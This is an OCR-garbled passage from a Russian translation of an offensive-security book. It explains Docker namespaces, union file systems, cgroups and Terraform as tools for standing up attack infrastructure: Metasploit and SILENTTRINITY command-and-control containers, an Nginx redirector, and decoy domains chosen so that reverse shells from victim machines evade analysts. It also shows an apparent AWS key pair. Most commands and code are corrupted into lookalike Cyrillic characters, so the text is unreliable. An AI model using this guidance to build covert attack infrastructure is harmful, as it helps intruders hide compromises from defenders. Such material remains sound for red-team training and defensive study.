ва процессов. Вот почему основная проблема при взломе контейнерной 
среды - нарушение изоляции пространства имен. Если мы каким-то об- 
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разом сможем запустить процесс в пространстве имен по умолчанию, 
мы сможем эффективно отслеживать все контейнеры на хосте. 


Пространство имен по умолчанию 


Рис. 3.3. Дерево процессов пих с двумя процессами, размещенными в новом 
пространстве имен 


Каждый ресурс внутри контейнера продолжает взаимодействовать 
сядром без каких-либо посредников. Контейнерные процессы просто 
ограничены ресурсами, имеющими один и тот же тег. С контейнера- 
ми мы находимся в плоской, но разделенной системе, тогда как вир- 
туализация напоминает набор русских матрешек. 


Если вы хотите узнать больше о пространствах 
имен контейнеров, ознакомьтесь с подробной статьей о простран- 
ствах имен Махмуда Ридвана (Майтиа Юамап) по адресу һіїрѕ Мммм. 
тора(.соти/. 


Контейнер Меазрой 


Давайте потренируемся на практическом примере, запустив контей- 
нер Меѓаѕріої. К счастью, хакер по имени росеап уже создал готовый 
к использованию образ системы, на котором мы можем выполнить 
это упражнение (его можно найти по адресу ћ1рѕ;//9/ћир.сот/рһосеап/ 
Боске е-т//). Сначала нам, конечно же, нужно установить роскКег: 


гоо@аЬ:~/# сиг - #551 ВЕЕре: //домп1оаа.Роскег. сот/ пих /ирипёи/9ра | ар*-Кеу адд - 


гоої@аЬ:~/# айі-арі-героѕіїогу \ 
"Деб [агсһ=ат64] һ&рѕ : //домп1оай.роскег.сот/1іпих/ибипёо \ 
$(15Ь ге1еаѕе -сѕ) \ 
ѕёаБ1е" 


гооЁ@аЬ:~/# арі ирдафе 
гоої@аЬ:~/# ар іпѕёа11 -у роскег-се 


Затем мы загружаем образ ПосКег, который содержит файлы 
Меѓаѕріоїг, двоичные файлы и зависимости, которые уже скомпили- 
рованы и готовы к работе, с помощью команды 0оскег ри11: 


гоо{@аЬ:-/# роскег ри11 рћосеап/тѕ# 
гооё@гаБ:~/# роскег гип --гм -1Ё рһосеап/тѕ# 
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* бёагёіпд Роз%дгезог 10 даёаБаѕе ѕегуег 
[ок ] 
гоо+@46459есісдс4: /орі/теаѕр1оії - Ёгатемогкё 


Команда ОосКег гип запускает двоичные файлы этого контейнера 
в новом пространстве имен. Опция - - гт удаляет контейнер после за- 
вершения, чтобы очистить ресурсы. Это полезная опция при тести- 
ровании нескольких образов. Опция -іЁ выделяет псевдотерминал 
и ссылается на устройство $4 п контейнера, чтобы имитировать ин- 
терактивную оболочку. 

Затем мы можем запустить Меазр|ой с помощью команды тѕЁсоп- 
ѕо1е: 


гооі@46459есіс0с4: /орі/теёаѕр10іё - Ғгатемогкё . /тѕЁсопѕо1е 


=[ меёаѕр10ії у5.0.54-йеу 


] 
+ -- --=[ 1931 ехр1015 - 1078 аџхі1іагу - 332 роѕї 1 
+ -- --=[ 556 рау1оайѕ - 45 епсойегѕ - 10 порѕ 1 
+ -- --=[ 7 емаѕіоп ] 
тѕ#5 > ехії 


Сравните это с установкой Меѓаѕріой с нуля, и вы, надеюсь, пойме- 
те, сколько крови и пота было сэкономлено этими двумя командами. 

Конечно, вы можете спросить: «Как в этой новой изолированной 
среде мы можем получить доступ к слушателю портов с удаленного 
веб-сервера №еїпх?» Отличный вопрос. 

При запуске контейнера ПросКег автоматически создает пару вир- 
туальных Еегпеї-устройств (меёһ в Мпих). Представьте, что это два 
разъема на концах физического кабеля Еїегпеї. Один конец кабеля 
помещен в новое пространство имен, где его может использовать кон- 
тейнер для отправки и получения сетевых пакетов. Этот меЁћ обычно 
носит знакомое имя е{ 19 внутри контейнера. Другой разъем распола- 
гается в пространстве имен по умолчанию и подключается к сетевому 
коммутатору, который передает трафик во внешний мир и из него. 
Ппих называет этот виртуальный кабель сетевым мостом. 

Выполнив команду ір аййг на машине, мы увидим мост роскег® по 
умолчанию с выделенным диапазоном ІР-адресов 172.17.0.0/16, го- 
товым к распределению по новым контейнерам: 


гооє@іаБ:~/# ір айдг 

3: Ооскег0: <№0-САВВТЕВ ,ВАОАРСАЅТ ‚МИЕТТСАЗТ ,ОР> ти 1500 кафе дгоир еҒаші 
1іпк/ећег 03:12:27:8#:69:42 Бга ЕЕ: РЕ: ҒҒ: ҒҒ: ҒҒ: РР 

1пе{ 172.17.0.1/16 Бга 172.17.255.255 ѕсоре 91оБа1 БосКег@ 

- -сокращено- - 


Каждый контейнер получает свою выделенную пару меїћ и, следо- 
вательно, ІР-адрес из диапазона ІР-адресов моста роскего. 
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Вернемся к нашей первоначальной задаче. Пересылка трафи- 
ка из внешнего мира в контейнер просто включает в себя перена- 
правление трафика на сетевой мост ОоскКег, который автоматически 
перенаправит его в нужную пару меїћ. Вместо того чтобы возиться 
с ірќаБ1еѕ, мы можем обратиться к росКег, чтобы создать правило 
брандмауэра, которое делает именно это. В следующей команде 
порты с 8400 по 8500 на узле будут сопоставлены с портами с 8400 
по 8500 в контейнере: 


гоо{@аЬ:-/# ѕидо роскег гип --гм \ 
-16 -р 8400-8500:8400-8500 \ 

- -/. 1524: /гооЁ/.тѕ?4 \ 

-\ /ётр/тѕ#: /ётр/даёа \ 

рћһосеап/тѕЁ 


Теперь мы можем связаться с обработчиком, прослушивающим 
любой порт между 8400 и 8500 внутри контейнера, отправляя пакеты 
на ІР-адрес хоста в том же диапазоне портов. 


ПЗ 7] Если вы не хотите возиться с отображением портов, 
просто подключите контейнеры к сетевому интерфейсу хоста, исполь- 
зуя флаг - -пе{=Ноз* в команде ВосКег гип вместо -р ххх:хххх. 


В предыдущей команде мы также сопоставили каталоги ~/ .т5Ғ4 
и /+птр/мзР на хосте с каталогами в контейнере /гоої/.тѕ#4 и /ётр/ 
даа соответственно – полезный прием для сохранения данных при 
нескольких запусках того же контейнера Меказр]ой. 


Чтобы отправить контейнер в фоновый режим, прос- 
то нажмите СТВГ-Р, а затем СТЕГ-О. Вы также можете отправить 
его в фоновый режим с самого начала, добавив в команду запуска флаг -4. 
Чтобы снова попасть внутрь, выполните команду ВоскКег рѕ, получите 
Доскег Ш и выполните команду ВосКег аї+асћ <1р>. Как альтернативу 
вы можете запустить команду БосКег ехес -1ї <І0> $В. Другие полезные 
команды можно найти в инструкции ОБоскег по адресу №Нр.//оскенав:. 
соЦабтх.соти. 


Файловая система ШЕЅ 


Мы плавно подошли к следующей концепции контейнеризации - 065- 
единенной файловой системе (итоп #еѕуѕѓіет, ОЕЅ), которая позволя- 
ет использовать слияние файлов из нескольких файловых систем для 
формирования единой и согласованной файловой системы. Давайте 
рассмотрим это на практическом примере. Мы создадим образ ро- 
скег для ЅП.ЕМТТЕІМІТҮ. 

Образ РосКег определяется в роскегЁі1е. Это текстовый файл, со- 
держащий инструкции по сборке образа, определяющие, какие фай- 
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лы загружать, какие переменные среды создавать и все остальное. 
Команды интуитивно понятны, как показано в листинге 3.2. 


Листинг 3.2. Роскегїе для запуска командного сервера 5ШЕМТТЕИМТУ 


# Ғе: ~ /ЅІЕМТТАІМІТҮ/ОоскегЁ\ле 
# Базовый образ Ооскег с файлами для запуска РуЁћоп 3.7 
ЕВОМ руЁћоп:ѕЁгеёсһ-511т-3.7 


# Устанавливаем 91%, таке и дсс 
КОМ арё-деё ирдафе && арё-деі іпѕїа11 -у 91 паке осс 


# Скачиваем ЅІГЕМТТАІМ№ІТҮ и меняем каталоги 
ВОМ 91 с1опе ћёрѕ: / /91ЕВиБ. сот/БуЕЗЬ 1333г /ТЕЕМТТАТМТТУ/ /гоо/51/ 
МОВКОТВ /гооё/5#/ 


# Устанавливаем зависимости РуЁћоп 
КОМ руєћоп3 -т рір іпѕ&а11 -г гедиігетепёѕ.ЁхЁ 


# Сообщаем будущим пользователям роскег, что нужно подключить порт 5000 
ЕХРОЅЕ 5000 


# ЕМТВУРОТМТ будет первой выполненной командой при запуске БосКег 
ЕМТАҮРОІМТ ["ру{Коп3", "Ееамзегуег.ру", "0.0.0.0", "ѕЕгіпдраѕѕмогӣ" ] 


Мы начинаем с создания базового образа Руолп 3.7, который пред- 
ставляет собой набор файлов и зависимостей для запуска Руіћоп 3.7, 
уже подготовленный и доступный в официальном репозитории ро- 
скег Ниф. Затем мы устанавливаем некоторые распространенные ути- 
литы, такие как 91ї, таке и дсс, которые позже будем использовать 
для загрузки репозитория и запуска командного сервера. Инструкция 
ЕХРОЅЕ предназначена исключительно для целей документирования. 
Чтобы фактически открыть данный порт, нам все равно нужно будет 
использовать аргумент -р при выполнении боскКег гип. 

Затем мы используем единственную инструкцию, чтобы получить 
базовый образ, заполнить его упомянутыми инструментами и файла- 
ми и дать ему имя 511епі: 


гооє@гаБ:~/# роскег Биі1а -Е $Депе . 

Ѕёер 1/7 : ЕВОМ руһоп:3.7-511т-5Ёгеёсһ 

---> ҒайгЬ9#06азЬ 

Ѕёер 2/7 : КОМ ар*-де{ф ирдафе && ар-де іпѕёа11 -у 91+ таке дсс 
---> Џѕіпд сасһе 

---> 94#5#с21а5с4 

- -сокращено- - 


ЅиссеѕѕҒШЛЛу Би 15658с#8е13с 
биссе$$ Ду Ёаддей ѕ11епё:1аёеѕі 
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Каждая инструкция создает новый набор файлов, которые сгруппи- 
рованы в папке. Эти папки обычно хранятся в /маг /146/0оскег /омег- 
1ау2/ и получают имена в виде случайного набора символов, который 
будет выглядеть примерно так: Га92590964ЗЬ, 94151 с21а5с4 ит. д. Когда 
образ создан, файлы в каждой папке объединяются в один новый ка- 
талог, который называется слоем образа (ітағве Іауег). Более высокие 
каталоги перекрывают более низкие. Например, файл, измененный 
на шаге 3 в процессе сборки контейнера, будет перекрывать тот же 
файл, созданный на шаге 1. 


Каталог различается в зависимости от используемо- 
го драйвера хранилиша: [маг[11Ь/0оскег /аиЁѕ /аіҒҒ/, /маг/ЛАЬ/БосКег/ 
омег1ау/аіҒҒ/ или /маг/116/роскег/оуег1ау2/4іҒҒ/. Более подробная 
информация о драйверах хранилища доступна по адресу ћїїірѕ//а0скг. 
1у/2М№7КР5В. 


Когда мы запускаем этот образ, роскег монтирует слой образа внут- 
ри контейнера как единую файловую систему с доступом только для 
чтения и сһгооё. Чтобы пользователи могли изменять файлы во время 
выполнения, Роскег дополнительно добавляет сверху доступный для 
записи слой, называемый слоем контейнера, или иррегӣіг, как пока- 
зано на рис. 5.4. 


Каталог контейнера ||, Файл1 11 Файл2 1 Файл3 1, Файл4 | "тегдеа" 


Слой контейнера Г оао | "иррегаїг" 


Рис. 3.4. Доступный для записи слой для образа Роскег. Источник: ћїїрѕ;//40скг1у/39Т01ед 


Компоненты Ооскег 


Компоненты ОуегіауЕ5 


Этот слой придает контейнерам неизменность. Несмотря на то что 
вы перезаписываете весь каталог /Біп во время выполнения, вы на са- 
мом деле изменяете только эфемерный доступный для записи верх- 
ний слой, который маскирует исходную папку /Біп. Доступный для 
записи слой удаляется при удалении контейнера (вспомните пара- 
метр - -гт). Базовые файлы и папки, подготовленные во время сборки 
образа, остаются нетронутыми. 

Мы можем запустить только что созданный образ в фоновом режи- 
ме с помощью ключа -4: 


гооё@гаБ:~/# БосКег гип -а \ 
-\ /орё/5&: /гоої/ѕ /даёа \ 
-р5000: 5000 \ 

ѕ4Лепі 
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Заағ0сЁаа#374#9с049440адерЬ34016294адѕаБс48с 


# Подключение к командному серверу, работающему в контейнере 
гооЁ@гаБ:~51/# руВоп3.7 5#.ру \ 
м55:/ /узегпапе : ѕёгопдРаѕѕмогСапЁСиеѕ50192.168.1.29:5000 


[1] $Т >> 


Прекрасно. У нас есть рабочий образ ЅЗПЕМТТАІМІТҮ. Чтобы иметь 
возможность загрузить его с любой рабочей станции, нам нужно от- 
править его в репозиторий ЮосКег. Для этого мы создаем учетную 
запись на ћіірѕ;//Лћир.Роскегсот, а также наш первый общедоступный 
репозиторий под названием 511епі. Следуя соглашению Роскег Нир, 
мы переименовываем образ РоскКег в имя пользователя /имя репозитория 
с помощью команды ОоскКег *ад, а затем отправляем его в удаленный 
реестр, например так: 


гоо{@1аЬ:-/# БосКег 1одіп 
Изегпате: зрагсР\ом 
Раѕѕмога: 


Годіп Ѕиссеейей 


гооє@гаБ:~/# БосКег {ад 511епі ѕрагс#ом/ѕ11епі 
гооє@іаБ:~/# БосКег риѕһћ ѕрагсЁ1ом/ѕ11епё 


Теперь наш образ ЗПЕМТТКІМІТҮ находится в одном шаге от запус- 
ка на любой машине Ііпих, которую мы создадим в будущем. 


Сдгоирѕ 


Последним жизненно важным компонентом контейнеров являются 
контрольные группы (сопіто] етоирѕ, сртоирѕ), добавляющие некото- 
рые ограничения, которые пространства имен не могут преодолеть, 
такие как ограничения ЦП, памяти, сетевой приоритет и устройства, 
доступные для контейнера. Как следует из названия, контрольные 
группы предлагают способ группировки и ограничения процессов 
с помощью одного и того же ограничения на данный ресурс; на- 
пример, процессы, входящие в контрольную группу /ѕуѕёем.ѕ511се/ 
ассоипіѕ -йаетоп. ѕегуісе, могут использовать только 50 % ЦП и 20 % 
общей пропускной способности сетевого адаптера и не могут обра- 
щаться к внешнему жесткому диску. 

Ниже показан вывод команды ѕуѕіеті-сдёор, которая отслеживает 
использование контрольных групп в системе: 


гооЁ@гаБ:~/# ѕуѕёета-сдїор 


Сопёго1 Сгоур Та5кѕ СРО Метогу Іпри&/5 
/ 188 1.1 1.90 - 
[0доскег 2 - 2.2М - 
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[0оскег/080210аа5с63а81а761130Ғабес76#9 1 - 660.0К - 
[0оскег/24еҒ188842154#068925066ҒҒҒѕа6Ға 1 - 472.0К - 


Мы вернемся к контрольным группам позже, когда будем говорить 
о привилегированном режиме в Ооскет. 

Итак, резюмируем: какого бы облачного провайдера мы ни выбра- 
ли и какой бы дистрибутив Шпих они ни предлагали, пока есть под- 
держка Юоскег, мы можем создавать наши полностью настроенные 
серверные части С2, используя пару командных строк. Следующая 
команда запустит наш контейнер Меазр]ой: 


гоо@Гаь:-/# роскег гип -94{ \ 

-р 9990-9999:9990-9999 \ 

-у $НОМЕ/ . 54: /гоо/.тѕ#4 \ 

-\ /ётр/тѕ#: /Етр/даа рһосеап/тѕ# 

А эта команда запустит контейнер ЅІГЕМТТВІМІТҮ: 
гооё@гаБ:~/# роскег гип -а \ 

-\ /орё/5&: /гоої/ѕ /даёа \ 
-р5000- 5050: 5000-5050 \ 

ѕрагсҒ1ом/ѕАЛепё 


В этих примерах мы использовали базовые версии Меѓаѕріоії и $1- 
ГЕМТТАІМІТҮ, но мы могли бы так же легко добавить пользователь- 
ские полезные нагрузки Воо-Іапе, файлы ресурсов Меѓаѕріоії и мно- 
гое другое. Знаете, что здесь особенно круто? Мы можем дублировать 
наши серверные части С2 столько раз, сколько захотим, легко поддер- 
живать разные версии, заменять их по желанию и так далее. Очень 
удобно, правда? 

Последний шаг – «докеризация» сервера М№еіпх, который направ- 
ляет вызовы либо к Меазр]ой, либо к $ЅПЕМТТКІМІТҮ в соответствии 
с полученным ОВГ. 

К счастью, в этом случае большую часть тяжелой работы уже проде- 
лал (@ѕіайсћоаї, который отлично справился с автоматизацией уста- 
новки М№ешх с помощью 8$51-сертификатов, сгенерированных 1еѓѕ 
Епсгуре с помощью ћіїрѕ;//9іёћир.сот/Ѕїаіісїоаі/Ооскег-пдіпх-сегірої. Как 
показано в листинге 3.3, нам просто нужно внести пару изменений 
в файл ОоскегЕЙе в репозитории, чтобы он соответствовал нашим по- 
требностям, например добавить обработку переменного доменного 
имени и ІР-адрес С2 для пересылки трафика. 


Листинг 3.3. Ооскегїе для настройки сервера №іпх с сертификатом 
Ге Епсгурі 


# Ге: ~/пдіпх/оскегҒі1е 
# Базовый образ со скриптами конфигурации №іпх и [еЁ'5 Епсгурё 
ЕВОМ ѕЕа+ісҒ.оаї/пдіпх -сегіБої 


# Копирование шаблона конфигурации №іпх 
СОРҮ *.сопЁ /еіс/подіпх/сопЁ.а/ 
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# Копирование фиктивной веб-страницы 
СОРУ --сПпомп=имм-Фафа:ими-Чафа НЕт1/* /маг/ммм/ Вт / 


# Небольшой скрипт, заменяющий __ООМАТ№М _ на значение ЕМУ, и то же самое для ІР 
СОРҮ іпіё.ѕ$ћһ /зсгАрЕ$/ 


ЕМЫ РОМАІМ№= "ммм. сиѕЁотӢотаіп. сот" 
ЕМЫ С21Р="192.168.1.29" 
ЕМУ СЕАТВОТ_ЕМАІІ =ѕрагс. 1.ом@ргоёоптаі1.. сот 


смо ["/Бап/Баѕћ", "/ѕсгірёѕ /іпіЁ. В" ] 


Скрипт іпіё.ѕћ – это просто пара команд $е4, которые мы исполь- 
зуем для замены строки _ _ООМАТМ__ в файле конфигурации М№еіпх на 
переменную среды $00МАІМ, которую мы можем переопределить во 
время выполнения с помощью ключа -е. Это означает, что какое бы 
доменное имя мы ни выбрали, мы можем легко запустить контейнер 
Метшх, который автоматически зарегистрирует соответствующие сер- 
тификаты ТІ. 

Конфигурационный файл №еіпх почти такой же, как в листинге 3.5, 
поэтому я не буду повторяться. Вы можете посмотреть все файлы, 
участвующие в создании этого образа, в репозитории книги на СієНиЬ 
по адресу ими. поѕѓагсћ.сот/Һоу-һаск-дһоѕї. 

Запуск полнофункционального сервера М№еіпх, который перена- 
правляет трафик на наши конечные точки С2, теперь умещается 
в одну строку: 


гоо{@1аЬ:-/# БосКег гип -а \ 

-р80:80 -р443:443 \ 

-е РОМАІМ№=" ими. сиѕЁотйотаіп. сот" \ 

-е С21Р="192.168.1.29" \ 

-\ /ор&/Леёѕепсгурї: /еёс/Леёѕепсгурі \ 
ѕрагсҒ1ом/пдіпх 


О№-запись иии. сиѕотіотаіп. сот, очевидно, должна указывать на 
уже существующий общедоступный ІР-адрес сервера, чтобы этот ма- 
невр сработал. Хотя контейнеры Меазр]ой и ЅЗПЕМТТВІМІТҮ могут 
работать на одном хосте, контейнер М№ешх должен работать отдель- 
но. Считайте это своего рода технологическим предохранителем: он 
первым перегорает при малейшей проблеме. Если, например, наш ІР- 
адрес или домен разоблачен и занесен в черные списки, мы просто 
перезапускаем новый хост и запускаем команду роскег гип. Двадцать 
секунд спустя у нас есть новый домен с новым ІР-маршрутом на те же 
серверные части. 


Маскировка ІР-адресов 


Вам нужно позаботиться о покупке пары обычных доменов, чтобы 
замаскировать свои ТР-адреса. Обычно я предпочитаю покупать два 
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типа доменов: один для обратных оболочек рабочих станций, а дру- 
гой - для серверов на машине жертвы. Это важное различие. Пользо- 
ватели, как правило, посещают обычные веб-сайты, поэтому имеет 
смысл купить домен, название которого подразумевает, что это блог 
о спорте или кулинарии. Здесь подойдет что-то наподобие ѕрогїі-апӣ- 
ПЕе.сот. 

Однако было бы странно, если бы сервер на машине-жертве ини- 
циировал подключение к сайту про спорт, поэтому второй домен, 
который необходимо приобрести, должен иметь название типа Ппих- 
расКкеїѕ.оге, который мы можем замаскировать под законную точку 
распространения пакетов, разместив несколько исполняемых файлов 
Прих и файлов исходного кода. Сервер, инициирующий подключение 
к Всемирной паутине для загрузки пакетов, никого не удивит. Я знаю 
про несчетное количество ложных срабатываний, которые напрасно 
побеспокоили аналитиков угроз только из-за того, что какой-то сер- 
вер в корпоративной сети запустил удачное обновление, загрузившее 
сотни пакетов с неизвестного хоста. Мы можем спрятаться за ложны- 
ми срабатываниями! 

Я не буду подробно останавливаться на процедуре регистрации 
домена, потому что перед нами не стоит задача взломать компанию 
с помощью фишинга, так что мы обойдемся без глубокой проверки 
истории домена, классификации, аутентификации домена через Оо- 
таіпКеуѕ Іаепіійеа Май (ОКМ) и так далее. 

Наша инфраструктура почти готова. Нам все еще нужно немного 
настроить наши фреймворки С2, подготовить стейджеры и запустить 
прослушиватели, и скоро мы этим займемся. 


И 13 Как ЗШЕМТТЕПМТУ, так и Меазрой поддерживают 
файлы или сценарии среды выполнения для автоматизации настройки 
прослушивателя/стейджера. 


Автоматизация настройки сервера 


Последний трудоемкий этап, который нам нужно автоматизиро- 
вать, – это настройка реальных серверов у облачного провайдера. 
Независимо от обещаний провайдеров, у большинства из них нуж- 
но пройти через утомительное количество меню и вкладок, чтобы 
настроить работающую инфраструктуру: правила брандмауэра, тип 
и объем жесткого диска, конфигурация машины, ключи $$Н, пароли 
и многое другое. 

Этот шаг во многом зависит от самого облачного провайдера. Та- 
кие гиганты, как АМГ5, МісгоѕоЁ Алиге, АПБаБа и Соое СІоџа РІаїѓогт, 
предлагают полную автоматизацию с помощью множества мощных 
АРІ, но других облачных провайдеров, похоже, это не волнует ни на 
йоту. К счастью, это не так уж важно, поскольку в любой момент вре- 
мени вы управляете только тремя или четырьмя серверами. Вы мо- 
жете легко настроить их или клонировать из существующего образа, 
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и тремя командами росКег гоп получить рабочую инфраструктуру С2. 
Но если у вас есть кредитная карта, содержимым которой вы не про- 
тив поделиться с А\У5, вы сможете автоматизировать и эту последнюю 
утомительную настройку и заодно познакомиться с концепцией, ко- 
торая должна лежать в основе любой современной вычислительной 
среды: инфраструктура как код. 

Инфраструктура как код (їпЁгаѕігисіџге аз сое, [а5) основана на 
идее использования полного декларативного описания компонен- 
тов, которые должны работать в любой момент времени, от имени 
машины до последнего установленного на ней пакета. Затем движок 
[а5 анализирует этот файл описания и исправляет любые обнаружен- 
ные несоответствия, такие как обновление правила брандмауэра, из- 
менение ІР-адреса, подключение дополнительного диска и т. д. Если 
ресурс по той или иной причине пропадает, он автоматически вос- 
станавливается в соответствии с желаемым состоянием. Звучит вол- 
шебно, правда? 

Сегодня существует несколько инструментов для достижения та- 
кого уровня автоматизации (как на уровне инфраструктуры, так и на 
уровне ОС), но тот, который мы будем использовать, называется Тег- 
таюгт от НаѕћіСогр. 

Теггаѓогт имеет открытый исходный код и поддерживает ряд об- 
лачных провайдеров (перечисленных в документации на Аіїрѕ;//ед- 
5нулеггарюгт.го), что делает его лучшим вариантом, если вы выберете 
малоизвестного провайдера, который принимает 7хсазВ. Остальная 
часть главы будет посвящена А\М/$, поэтому вы сможете легко воспро- 
извести код и научиться работать с Теггаѓогт. 

Я хочу подчеркнуть, что без этого шага вполне можно обойтись. Ав- 
томатизация настройки двух или трех серверов может потребовать 
больше усилий, чем сэкономить, поскольку у вас уже есть готовые 
контейнеры, но знание процесса автоматизации помогает изучить 
текущую методологию Ое\уОрз, чтобы лучше понять, что искать, когда 
вы окажетесь в аналогичной среде. 

Теггаѓогт, как и все инструменты на языке Со|ап®, представляет со- 
бой статически скомпилированный двоичный файл, поэтому нам не 
нужно заморачиваться с изнурительными зависимостями. Мы под- 
ключаемся по 55Н к нашим опорным серверам и быстро скачиваем 
инструмент, например так: 


гоо{@Воипсег:-/# иде{\ 

ћеерѕ : //ге1еаѕеѕ.һаѕһісогр.сот/ёеггаҒогт/0.12.12/ёеггаҒогт_ 0.12.12 1іпих_аті64.21р 
гоої@Воцпсег:~/# опір їеггаЁогт_ 0.12.12 14пих_атаб4. 21р 

гоо{@Воипсег:-/# сһтой +х ЁеггаҒогт 


Теггаѓогт будет взаимодействовать с облаком АМГ5, используя вве- 
денные вами действительные учетные данные. Перейдите в АҮ/Ѕ ІАМ - 
службу управления пользователями, – чтобы создать программную 
учетную запись и предоставить ей полный доступ ко всем операциям 
ЕС2. ЕС2 - это сервис АМ, управляющий машинами, сетями, баланси- 
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ровщиками нагрузки и многим другим. Если вы впервые имеете дело 
с АМ/5, можете воспользоваться пошаговым руководством по созданию 
учетной записи в [АМ по адресу: ћїїрѕ;/еге1е55-ѕїаск.сот/сһарїегѕ/. 

На панели создания пользователя [АМ предоставьте программный 
доступ (ргоэтаттайс ассеѕѕ) только что созданному пользователю, 
как показано на рис. 5.5. 


Ѕеї иѕег а&ай$ 


Үоџ сап ада лире иѕегѕ аї опсе уїїћ {пе ѕате ассеѕѕ їуре апа регтіѕѕіопѕ. [еагп гпоге 


Узег пате їеггаѓогт 


ЅеІесї АМ/$ ассеѕѕ їуре 
ЅеІесї һом їһеѕе изег МИ! ассеѕѕ АҮ. Ассеѕѕ Кеуз апа аџїодепегаїей раѕѕуогаѕ аге ргоуійей іп їће Іаѕї ѕїер. Геагп тоге 


Ассеѕѕ {уре* ([/) РгодгапитаНс ассеѕѕ 
ЕпаЫез ап ассеѕѕ кеу 10 апа ѕесгеї ассеѕѕ кеу Гог їһе А\/$ АРІ, СИ, ОК, апа оїћег 
Яеуеіортепї 10015. 


Рис. 3.5. Создание пользователя с именем їѓеггајогт с доступом к АИ/5 АРІ 


Разрешите пользователю полный контроль над ЕС2 для админист- 
рирования машин, подключив политику Ата7топЕС2РиПАссез$, как 
показано на рис. 3.6. 


~ Ѕеї регтіѕѕіопѕ 
10? Аай иѕегіо дгоир ©. ЕЕ р от те роїісіеѕ 
Сгеаїе ройсу 
ЕіКег роЇісіеѕ м О. ес2ші Ѕһоміпдј 
РоЇісу пате ~ Туре Џѕеа аз 
М) ь АтагопЕС2ҒШІАссеѕѕ АМ/$ тападеа Регтіѕѕіопѕ ройсу (1) 


Рис. 3.6. Привязка политики АтагопЕС2ЕиПАссеѕѕ к пользователю ѓеггајогт 


Загрузите учетные данные в виде С5У-файла. Запишите идентифи- 
катор ключа доступа и секретный ключ доступа, расположенные, как 
показано на рис. 3.7. Они понадобятся нам дальше. 


3. Оомтіоай .сѕу 


Џѕег Ассеѕѕ Кеу 10 Ѕесгеї ассеѕѕ кеу 
› © їептаѓогт АКА44ЕЗ\У/ОЕААЗОВЕ5АО РЕддѕарттх4ихОбхХаһуи7 
Т21537а$ҺОҮЅООХ/А Ніде 


Рис. 3.7. Учетные данные АРІ для запроса АРІ АИ/5 
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Получив ключ доступа АМ/5 и секретный ключ доступа, загрузите 
инструмент командной строки АМ5 и сохраните свои учетные данные: 


гооЁ@Воџпсег:~/# аре іпѕёа11 амѕс1і 


гооЁ@Воџпсег:~/# амз сопҒідиге 

АМЅ Ассеѕ5 Кеу ТО [№пе]: АКІАДДЕЅИОЕААЅОРЕЅА0 

АМЗ ЅесгеЁ Ассеѕ5 Кеу [№пе]: ОЕдд5архрА4и506хХаһуи7Т2153... 
РреҒаџ1Е гедіоп пате [№пе]: еџ-меѕ-1 


Затем мы настраиваем папку для размещения конфигурации инф- 
раструктуры: 


гоо{@Воипсег:-/# ткдіг іпЁга && са 1пЁга 


Далее создаем два файла: ргоуійег.#Ғ и таіп.їҒ. В первом случае 
мы инициализируем коннектор АМҮ, загружаем учетные данные 
и назначаем регион по умолчанию для ресурсов, которые мы собира- 
емся создать, например еџ-меѕї-1 (Ирландия): 


# ргоуійег.ЁҒ 

ргоуійег "амѕ" { 
гедіоп = "еџ-меѕі-1" 
мегѕіоп = "~> 2.28" 


} 


В файл таіп.ЁҒ мы поместим основную часть определения нашей 
архитектуры. Одной из базовых структур Теггаѓогт является ресурс – 
элемент, описывающий дискретную единицу службы облачного про- 
вайдера, такую как сервер, ключ $8Н, правило брандмауэра и т. д. 
Степень детализации зависит от облачного сервиса и может быстро 
вырасти до абсурдного уровня сложности, но это цена гибкости. 

Чтобы попросить Теггаѓогт создать сервер, мы просто определяем 
ресурс амѕ_іпѕіапсе, как показано ниже: 


# паіп. ЕР 

геѕоигсе "амѕ іпѕёапсе" "Баѕіс_ес2" { 
аті = "аті -0039с41а106230асЬ" 
іпѕЁапсе уре = "+2. тісго" 

} 


Наш ресурс Баѕіс_ес2 – это сервер, который развернет образ ма- 
шины Ата=оп (Ататоп тасһіпе плазе, АМП) с идентификатором аті- 
0039с41а106230асЬ, представляющий собой ипќи 18.04. Вы можете 
просмотреть перечень доступных образов ОБипеа по адресу 1їрѕ;// 
сІоиа-ітадеѕ.ирипіи.сот/Лосаіѓог/ес2/. Сервер (или экземпляр) относится 
ктипу 42.пісго, что дает ему 1 ГБ памяти и один виртуальный ЦП. 
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ПМ 5478] Документация Теггајогт очень поучительна и полез- 
на, поэтому не ленитесь обращаться к ней при создании своих ресурсов: 
Вр /Лму.еггајогт.іо/а0с5/. 


Сохраните таіп.Ғ и инициализируйте ТеггаЮгт, чтобы он мог за- 
грузить провайдера АМ/5: 


гоо{@Воипсе: ~ /іпЁга# еггаФогм ілі 
Іпіёіа1іғіпд ће БасКепд... 
Іпібіа1171пд ргоуійег р10діпѕ... 

- ромп1оадіпд р1одіп Ёог ргоуійег "амз 
ТеггаҒогт Ваз Бееп зиссе$$Ри\Лу іпіёіа1іғеа! 


Затем выполните команду {еггафогт Ёп для форматирования таіп. 
{Е, за которой следует инструкция р1ап для создания списка измене- 
ний инфраструктуры, как показано далее. Вы можете видеть, что ваш 
сервер должен быть создан с атрибутами, которые вы определили ра- 
нее. Весьма неплохо. 


гоо*@Воипсе: -/1пРгай %еггаРогм Ёп && ЁеггаЁогт р\ап 
ТеггаФогм мі11 регФогт {Ве Ғо1Ломіпд ас оп$: 


амѕ_іпѕёапсе.Баѕіс_ес2 мі11 Бе сгеа{ед 

гезоигсе "амѕ іпѕёапсе" "Баѕіс_ес2" { 

апі = "аті -0039с41а106230асЬ" 

агп = (Кпомп аЁёег арр1у) 
аѕѕосіаёе рир11с ір аййгеѕѕ = (Кпомп аЁ%ег арр1у) 
іпѕЁапсе Ёуре = "2. тісго" 

- - сокращено- - 


+++ + + 


Р1ап: 1 +о аай, 0 фо сһапде, 0 фо йеѕїгоу. 


После проверки этих атрибутов выполните команду {еггаФогм ар- 
р1у для развертывания сервера на АМ. Эта операция также локально 
создает файл состояния, описывающий текущий ресурс - единствен- 
ный сервер, который вы только что создали. 

Если вы вручную остановите сервер на АМ и повторно выполни- 
те команду ФеггаФогм арр\у, она обнаружит несоответствие между 
локальным файлом состояния и текущим состоянием наших экзем- 
пляров ЕС2 и устранит его путем повторного создания сервера. Если 
вы хотите запустить, к примеру, еще девять серверов с той же кон- 
фигурацией, установите для свойства соуп* значение 10 и выполните 
команду ёеггаҒогт арр1у еще раз. 

Если вы попробуете вручную запустить 10 или 20 серверов на А\М/$ 
(или любого облачного провайдера), а затем управлять ими, то вскоре 
покрасите волосы в зеленый цвет и начнете разговаривать с розовы- 
ми единорогами. Ате из вас, кто использует Теггаѓогт, просто обновят 
